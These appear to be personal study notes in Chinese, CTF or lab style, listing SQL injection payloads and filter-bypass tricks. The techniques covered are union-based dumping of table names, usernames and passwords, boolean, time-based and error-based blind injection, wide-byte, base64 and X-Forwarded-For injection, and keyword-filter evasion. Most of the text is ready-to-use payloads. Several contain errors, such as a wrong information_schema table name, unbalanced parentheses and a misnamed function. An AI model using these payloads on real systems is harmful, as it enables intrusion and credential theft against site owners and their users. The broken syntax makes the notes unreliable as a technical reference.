判断是否存在sql注入首先在id后加’ 再次加载再注释--+ ,实现逃逸后进行and 1=1和and 1=2两个回显页面并比较,如果不同则存在sql注入漏洞
联合查询:union select
order by
爆表
group_concat(table_name)(table_name)from information_schema.table where table_schema=' 数据库名字 '
爆字段名
group_concat( '存放用户信息的字段名‘
爆用户名和密码
group_concat(username,id,password)添加id分隔用户名和密码。
布尔盲注:首先无论拼接’ - ” )均无回显或者说回显不变说明联合查询失效,需要尝试盲注
先判断数据库库名长度 'and length(database())>=1--+
判断数据库库名 ' and substr(database(),1,1)=' '--+
引号里填写a-z,0-9 判断且字母不分大小写
同样的可以将字母利用org函数转换为ascii码进行判断,例如
'and ord(substr(database(),2,1)=115--+
s 的ascii码是115
同样的操作多次重复便可得到数据库名称和用户信息,例如 ' and substr((select table_name from information_schema.table where table_schema=' 数据库名字 ' limit 0,1),1,1)=''--+
' and substr((select column_name from information_schema.columns where table_name='存放用户信息的字段名‘ limit 0,1),1,1)=''--+
报错注入:updatexml()函数
’ and updatexml (1,concat(0x7e,(select database())),0x7e),1)--+(获得数据库名称)
‘ and updatexml (1,concat(0x7e,(select user())),0x7e),1)--+(获得users)
’ and updatexml (1,concat(0x7e,(select 联合查询语句 limit m,n),0x7e),1)--+
时间注入:sleep()函数
一般与if函数链接使用
例如 if(length(database())>1,sleep(5),1)即若库名长度大于1,则mysql查询休眠5秒,否则查询1
同样可以利用sleep函数实现盲注即将sleep与substr函数结合实现对库名、表名以及字段名的猜测
堆叠注入则是利用分号将不同sql语句连起来而如果数据库中有PDO函数则应该在第二句sql语句中使用update和时间盲注进行查询。
二次注入则是通过已知信息通过不断注入恶意sql语句不断扩大漏洞从而获得更多的敏感信息。
宽字节注入则是利用转码和不同数据库编码从而实现逃逸,进而进行恶意sql语句注入,例如:
当‘被转码为\而当数据库编码为GBK时,反斜杠编码为%5c。
而宽字节注入格式为在地址后面添加%df,而此时%df%5c结合在GBK编码下是‘連’此时可以实现逃逸。
而base64注入则是数据库对数据进行base64转码,进而我们的注入语句判断首先要进行base64编码。而判断出有sql注入漏洞后即可进行联合查询。
XFF注入即利用bp抓包查看X-Forward-for如有该网址ip即进行判断是否有sql注入漏洞,如果有,进行联合查询从而完成注入。
网站在搭建时会对sql语句中的关键词句进行过滤,应运而生则出现了sql绕过
大小写绕过:例如and写为And或者写为AND
双写绕过则是过滤关键字符例如过滤or则输入or则不存在,输入order显示der,语句错误,这就是被过滤了,而绕开方式就是写成oorr和oorrder.
编码绕过:如果and被过滤则可以对and进行url全局编码进行绕过。
也可以通过内联注释绕过即id=1 and 1=1写为id=1 /*!and*/ 1=1